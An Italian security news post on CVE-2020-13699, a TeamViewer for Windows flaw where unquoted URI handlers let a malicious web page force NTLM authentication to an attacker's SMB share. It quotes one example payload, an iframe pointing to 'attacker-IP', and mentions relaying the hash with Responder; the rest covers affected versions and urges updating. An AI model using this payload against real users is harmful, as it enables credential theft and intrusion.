Un bug di TeamViewer potrebbe essere sfruttato per decifrare la password degli utenti

Un bug di TeamViewer potrebbe essere sfruttato per decifrare la password degli utenti

Una vulnerabilità ad alto rischio (CVE-2020-13699) in TeamViewer per Windows potrebbe essere sfruttata dagli aggressori remoti per decifrare la password degli utenti e, di conseguenza, portare a un ulteriore sfruttamento del sistema.

Informazioni su TeamViewer

TeamViewer è un'applicazione sviluppata dalla società tedesca TeamViewer GmbH ed è disponibile per sistemi operativi Windows, macOS, Linux, Chrome OS, iOS, Android, Windows RT Windows Phone 8 e BlackBerry.

Viene utilizzato principalmente per l'accesso remoto e il controllo di vari tipi di sistemi informatici e dispositivi mobili, ma offre anche funzionalità di collaborazione e presentazione (ad es. Condivisione desktop, conferenze Web, trasferimento file, ecc.)

Dall'avvento di COVID-19, l'uso aziendale del software è aumentato a causa del fatto che molti dipendenti sono costretti a lavorare da casa.

Informazioni sulla vulnerabilità (CVE-2020-13699)

CVE-2020-13699 è una debolezza della sicurezza derivante da un percorso o elemento di ricerca non quotato - più specificamente, è dovuto al fatto che l'applicazione non cita correttamente i suoi gestori URI personalizzati - e potrebbe essere sfruttata quando il sistema con una versione vulnerabile di TeamViewer installata visita un sito Web pericoloso.

"Un utente malintenzionato potrebbe incorporare un iframe dannoso in un sito Web con un URL predisposto ( iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs') che avvierebbe il client desktop Windows TeamViewer e lo costringerebbe ad aprire una condivisione SMB remota", ha spiegato Jeffrey Hofmann, un ingegnere della sicurezza presso Praetorian, che ha scoperto e responsabilmente rivelato il difetto.

"Windows eseguirà l'autenticazione NTLM all'apertura della condivisione SMB e tale richiesta può essere inoltrata (utilizzando uno strumento come il risponditore) per l'esecuzione del codice (o acquisita per il cracking dell'hash)."

Come notato prima, lo sfruttamento del difetto può essere avviato in remoto e non richiede alcuna autenticazione precedente. La falla sembra ideale per attacchi mirati ai pozzi d'acqua (come si chiamano in gergo).

Non ci sono indicazioni che questa vulnerabilità venga sfruttata in natura e non è attualmente disponibile alcun exploit pubblico.

Il CIS valuta che il rischio di sfruttamento è alto per enti governativi e commerciali di grandi e medie dimensioni, medio per enti governativi e aziende di piccole dimensioni e basso per utenti domestici.

Secondo l'azienda, la vulnerabilità interessa le versioni da 8 a 15 di TeamViewer (fino a 15.8.2) per la piattaforma Windows. Si consiglia agli utenti di eseguire l'aggiornamento alla versione 15.8.3 per correggere il bug.

Posted on

Author L'autore

Dario Fadda alias {Nuke}

Da sempre appassionato di informatica e del mondo open-source nel 2003 ho fondato il portale Spcnet.it per condividere articoli, notizie ed in generale tutto quello che riguarda il mondo dei computers, con particolare attenzione alle tematiche di Sicurezza informatica, Malware e Ransomware, ma anche guide di Programmazione e utili suggerimenti per tutte le fasce di interesse.
Dal 2006 sono membro del Gulch (Gruppo Utenti Linux Cagliari), con cui cerco di dare il mio contributo attivo per eventi e LinuxDay.
Su Twitter segnalo e condivido nuovi Phishing pericolosi con approfondimenti sul Bank Security.

Ho ideato Hacker Alert per effettuare ricerche di vulnerabilità e phishing in tempo reale.

Praticamente per tutto ciò che scopro e che è degno di nota ne condivido il codice sorgente su Git Hub.
Per tutto il resto c'è Dario Fadda .it che contiene "quasi" tutto di me.